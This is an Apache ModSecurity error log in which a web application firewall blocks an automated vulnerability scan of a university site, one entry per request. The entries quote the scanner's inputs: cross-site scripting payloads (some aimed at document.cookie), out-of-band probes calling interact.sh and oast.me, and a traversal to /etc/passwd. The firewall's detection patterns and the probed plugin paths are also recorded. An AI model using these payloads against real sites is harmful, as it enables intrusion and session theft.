[Tue Aug 29 11:53:42.792031 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoAk1sAAAAC"]
[Tue Aug 29 11:53:43.596942 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoW7T0AAAAJ"]
[Tue Aug 29 11:53:43.713585 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoUJdEAAAAB"]
[Tue Aug 29 11:53:45.536890 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoPudYAAAAM"]
[Tue Aug 29 11:53:45.544725 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAofm@AAAAAX"]
[Tue Aug 29 11:53:45.679565 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoesRIAAAAV"]
[Tue Aug 29 11:53:47.043194 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAot8TYAAAAn"]
[Tue Aug 29 11:53:47.773278 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAolKZsAAAAe"]
[Tue Aug 29 11:53:50.804082 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAolKaoAAAAe"]
[Tue Aug 29 11:53:51.692749 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAAox7LMAAAAN"]
[Tue Aug 29 11:53:51.713063 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApKaxUAAAAZ"]
[Tue Aug 29 11:53:52.887614 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAApHRWsAAAAP"]
[Tue Aug 29 11:53:52.972926 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApPcucAAAAa"]
[Tue Aug 29 11:53:53.545330 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAoGFgsAAAAE"]
[Tue Aug 29 11:53:54.540074 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAowNtwAAAAH"]
[Tue Aug 29 11:53:55.611469 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoqbXkAAAAj"]
[Tue Aug 29 11:53:55.674522 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAox7L8AAAAN"]
[Tue Aug 29 11:53:56.556025 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAoUJesAAAAB"]
[Tue Aug 29 11:53:56.619655 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoW7WgAAAAJ"]
[Tue Aug 29 11:54:00.556405 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApLWloAAAAI"]
[Tue Aug 29 11:54:00.609699 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAolKcUAAAAe"]
[Tue Aug 29 11:54:00.620254 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAofnAcAAAAX"]
[Tue Aug 29 11:54:00.719317 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoUJfwAAAAB"]
[Tue Aug 29 11:54:01.692202 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAo2m9IAAAAA"]
[Tue Aug 29 11:54:02.675998 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAoGFiEAAAAE"]
[Tue Aug 29 11:54:04.846093 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAApLWnEAAAAI"]
[Tue Aug 29 11:54:04.871497 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAox7N8AAAAN"]
[Tue Aug 29 11:54:08.161072 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApWYz8AAAAM"]
[Tue Aug 29 11:54:08.541283 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApa-A4AAAAg"]
